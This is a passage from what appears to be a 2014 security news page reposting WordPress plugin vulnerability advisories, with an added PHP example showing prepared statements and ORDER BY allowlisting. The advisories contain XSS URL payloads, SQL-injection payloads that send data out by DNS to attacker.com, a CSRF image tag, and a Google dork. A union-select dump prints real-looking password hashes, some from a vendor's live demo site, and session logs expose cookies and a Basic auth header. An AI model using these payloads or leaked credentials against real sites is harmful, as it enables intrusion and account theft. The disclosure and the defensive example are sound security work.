MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

1 Oct 2014

WordPress Photo Gallery Cross-Site Scripting (XSS)

Advisory ID: HTB23232
Product: Photo Gallery WordPress plugin
Vendor: http://web-dorado.com/
Vulnerable Version(s): 1.1.30 and probably prior
Tested Version: 1.1.30
Advisory Publication:  September 10, 2014  [without technical details]
Vendor Notification: September 10, 2014 
Vendor Patch: September 10, 2014 
Public Disclosure: October 1, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-6315
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered three vulnerabilities in the Photo Gallery WordPress plugin, which can be 
exploited to perform Cross-Site Scripting (XSS) attacks.
 
 
1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315
 
1.1 Input passed via the "callback" HTTP GET parameter to the "/wp-admin/admin-ajax.php" script is not properly sanitised 
before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted 
link and execute arbitrary HTML and script code in the victim's browser in the context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
 
http://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
1.2 Input passed via the "dir" HTTP GET parameter to the "/wp-admin/admin-ajax.php" script is not properly sanitised before 
being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted link and 
execute arbitrary HTML and script code in the victim's browser in the context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
 
http://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
1.3 Input passed via the "extensions" HTTP GET parameter to the "/wp-admin/admin-ajax.php" script is not properly sanitised 
before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted 
link and execute arbitrary HTML and script code in the victim's browser in the context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
 
http://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Photo Gallery 1.1.31
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23232 - https://www.htbridge.com/advisory/HTB23232 - Cross-Site Scripting (XSS) in 
Photo Gallery WordPress plugin.
[2] Photo Gallery WordPress plugin - http://web-dorado.com/ - This plugin is a fully responsive gallery plugin with 
advanced functionality. It allows having different image galleries for your posts and pages. You can create unlimited 
number of galleries, combine them into albums, and provide descriptions and tags.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and 
cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.


30 Sep 2014

WordPress All In One WP Security 3.8.2 SQL Injection

Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy 
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication:  September 3, 2014  [without technical details]
Vendor Notification: September 3, 2014 
Vendor Patch: September 12, 2014 
Public Disclosure: September 24, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in the All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, but can also be exploited by a non-authenticated attacker via a CSRF vector. 
 
 
1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242
 
1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
 
The PoC code below is based on the DNS Exfiltration technique and may be used to demonstrate the vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for a `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):
 
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
 
This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator into visiting a web page with a CSRF exploit, e.g.:
 
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
 
 
1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
 
The PoC code below is based on the DNS Exfiltration technique and may be used to demonstrate the vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for a `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):
 
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
 
This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator into visiting a web page with a CSRF exploit, e.g.:
 
<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to All In One WP Security 3.8.3
 
More Information:
https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.
[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.


30 Sep 2014

WordPress Users Ultra 1.3.37 SQL Injection

#################################################################################################
# Title                : Wordpress Users Ultra Plugin - SQL injection Vulnerability
# Risk                 : High+/Critical
# Author               : XroGuE
# Google Dork          : inurl: wp-content/plugins/users-ultra/
# Plugin Version       : 1.3.37
# Plugin Name          : users ultra
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip
# Vendor Home          : http://www.usersultra.com/
# Date                 : 2014/09/27
# Tested in            : Win7 - Linux
##################################################################################################
# Description: 
# This Vulnerability Available in Both Version of This Plugin (Free & Pro Version).
# You need To Login As member and Send Or Receive a Message To Get A Message ID To Inject it.
# The Vendor Demo Has This Vulnerability,Check it at This Link: http://usersultra.com/uultra-testing/
#
# PoC :
#
# http://localhost/wp/?page_id=117&module=messages&view=[id]
#
# Proof :
#
# http://www.aparat.com/v/vNI81
# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/
#
##################################################################################################
#
# Demo :
#
#    http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1
#
#
#    http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1
#
##################################################################################################
#
# Discovered By : XroGuE
# Website       : http://www.Att4ck3r.ir
# E-Mail        : info[at]att4ck3r[Dot]ir
#
##################################################################################################
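The two advisories above (HTB23231 and the Users Ultra report) describe the same defect at two call sites: a request value concatenated into SQL text. The block below is an added example written for this page, not code from either plugin. It shows the numeric-id case (the Users Ultra "view" parameter) closed with a bound parameter, and the ORDER BY case (the "orderby" / "order" parameters, which cannot be bound because they are identifiers) closed with an allowlist. The table layout, rows and request values are constructed; it runs offline against an in-memory SQLite database through PDO.

```php
<?php
// Added example, not code from All In One WP Security or Users Ultra: the two
// injection classes reported above, each beside a hardened form. Requires the
// pdo_sqlite extension; all data below is constructed for the demonstration.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE messages (id INTEGER PRIMARY KEY, sender TEXT, body TEXT, sent_at TEXT)');
$db->exec("INSERT INTO messages VALUES (1, 'alice', 'hello', '2014-09-27'),
                                       (2, 'bob',   'hi',    '2014-09-28')");
$db->exec('CREATE TABLE users (user_login TEXT, user_pass TEXT)');
$db->exec("INSERT INTO users VALUES ('admin', '[constructed hash placeholder]')");

// --- 1. Numeric record id (the Users Ultra "view" parameter) -----------------

// Vulnerable pattern: the request value is interpolated into the SQL text, so
// anything appended to the id is parsed as part of the query.
function vulnerable_message(PDO $db, string $view): array
{
    return $db->query("SELECT id, sender, body FROM messages WHERE id = $view")
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate the shape, then bind the value. A bound value is never
// parsed as SQL, whatever characters it contains.
function safe_message(PDO $db, string $view): array
{
    if (!ctype_digit($view)) {
        throw new InvalidArgumentException('message id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT id, sender, body FROM messages WHERE id = :id');
    $stmt->execute([':id' => (int) $view]);   // WordPress equivalent: $wpdb->prepare('... %d', $id)
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- 2. ORDER BY column and direction (the "orderby" / "order" parameters) ----

// Identifiers and keywords cannot be bound as parameters, so the only safe
// construction is a lookup in a fixed allowlist; unknown input falls back to a
// default and never reaches the query text.
const ORDERBY_COLUMNS = ['id' => 'id', 'sender' => 'sender', 'sent_at' => 'sent_at'];

function safe_order_clause(string $orderby, string $order): string
{
    $column    = ORDERBY_COLUMNS[strtolower($orderby)] ?? 'id';
    $direction = strtoupper($order) === 'DESC' ? 'DESC' : 'ASC';
    return "ORDER BY $column $direction";
}

function safe_list(PDO $db, string $orderby, string $order): array
{
    $sql = 'SELECT id, sender FROM messages ' . safe_order_clause($orderby, $order);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Demonstration with constructed request values standing in for $_GET ------
$get = [
    'view'    => '1 and 1=0 union all select user_login, user_pass, 1 from users',
    'orderby' => '(select version())',   // constructed; same shape as the advisory's payload
    'order'   => ',(select 1)',
];

print_r(vulnerable_message($db, $get['view']));   // the users row comes back: injection succeeded
try {
    safe_message($db, $get['view']);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";         // the same input never reaches SQL
}
print_r(safe_message($db, '1'));                   // a legitimate id still works
echo safe_order_clause($get['orderby'], $get['order']), "\n";   // falls back to the default ordering
print_r(safe_list($db, 'sent_at', 'desc'));        // allowlisted column and direction pass through
```

Run it with `php example.php`. The allowlist is the important half: developers often reach for escaping on `orderby`, but escaping functions are built for string literals and do nothing for a bare identifier, which is why a lookup table is the only construction that holds. The CSRF vector HTB23231 mentions is a separate defect, closed in WordPress by verifying a nonce on the admin request with `check_admin_referer()`; it is not shown here.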


30 Sep 2014

WordPress All In One Security And Firewall 3.8.3 XSS

Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
 
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
 
 
Release Date:
=============
2014-09-29
 
 
Vulnerability Laboratory ID (VL-ID):
====================================
1327
 
 
Common Vulnerability Scoring System:
====================================
3.3
 
 
Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a 
security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website 
security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces 
security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security 
practices and techniques.
 
(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
 
 
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.
 
 
Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)
 
 
Discovery Status:
=================
Published
 
 
Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Medium
 
 
Technical Details & Description:
================================
Two POST inject web vulnerabilities have been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin.
The vulnerability allows remote attackers to inject their own malicious script codes into the application-side of the vulnerable service.
 
The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module.
Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the  404 detection redirect url input field and the execution occurs in the same section 
next to the input field context that gets displayed again.
 
The second vulnerability is located in the file name error logs url input field of the FileSystem Components > Host System Logs module.
Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section 
next to the input field context that gets displayed again.
 
The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. 
Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module context.
 
 
Request Method(s):
        [+] POST
 
Vulnerable Module(s):
        [+] Firewall - Detection 404
        [+] FileSystem Components > Host System
Vulnerable Parameter(s):
        [+] 404 detection redirect url
        [+] file name error logs url
 
Affected Module(s):
        [+] Firewall - Detection 404
        [+] FileSystem Components > Host System
 
 
Proof of Concept (PoC):
=======================
1.1
The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or 
medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and 
steps below to continue.
 
PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
 
<tr valign="top">
                <th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\" 
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
                <span class="description">A blocked visitor will be automatically redirected to this URL.</span>
                </td> 
            </tr>
        </table>
        <input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" />
 
        </form>
        </div></div>
        <div class="postbox">
        <h3><label for="title">404 Event Logs</label></h3>
        <div class="inside">
                        <form id="tables-filter" method="post">
            <!-- For plugins, we also need to ensure that the form posts back to our current page -->
            <input type="hidden" name="page" value="aiowpsec_firewall" />
                        <input type="hidden" name="tab" value="tab6" />            <!-- Now we can render the completed list table -->
            <input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer" 
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" />  <div class="tablenav top">
 
    <div class="alignleft actions">
      <select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")"  />
</div>
<div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a>
<a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
<span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span>
<a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
<a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div>
<br class="clear" />
</div>
 
 
--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[8095] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:40:21 GMT]
      Content-Type[text/html; charset=UTF-8]
      Content-Length[8095]
      Connection[keep-alive]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
 
-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:40:22 GMT]
      Content-Type[text/html]
      Content-Length[557]
      Connection[keep-alive]
      Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
      Etag["4ea065b-3c6-4dcad48e5901e"]
      Accept-Ranges[bytes]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      X-Powered-By[PleskLin]
 
 
 
 
Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0
 
 
 
 
1.2
The second POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium 
user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
 
PoC: FileSystem Components > Host System Logs
 
<div class="inside">
            <p>Please click the button below to view the latest system logs:</p>
            <form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden">
<div>Enter System Log File Name:
                <input size="25" name="aiowps_system_log_file" value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
                <span class="description">Enter your system log file name. (Defaults to error_log)</span>
                </div>
                <div class="aio_spacer_15"></div>
                <input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit">
                <span style="display: none;" class="aiowps_loading_1">
                    <img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt="">
                </span>            
            </form>
        </div>
 
 
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime Type[application/json]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
      Content-Length[109]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      interval[60]
      _nonce[176fea481c]
      action[heartbeat]
      screen_id[wp-security_page_aiowpsec_filesystem]
      has_focus[false]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:53:44 GMT]
      Content-Type[application/json; charset=UTF-8]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Robots-Tag[noindex]
      x-content-type-options[nosniff]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]
 
 
 
 
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[6136] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
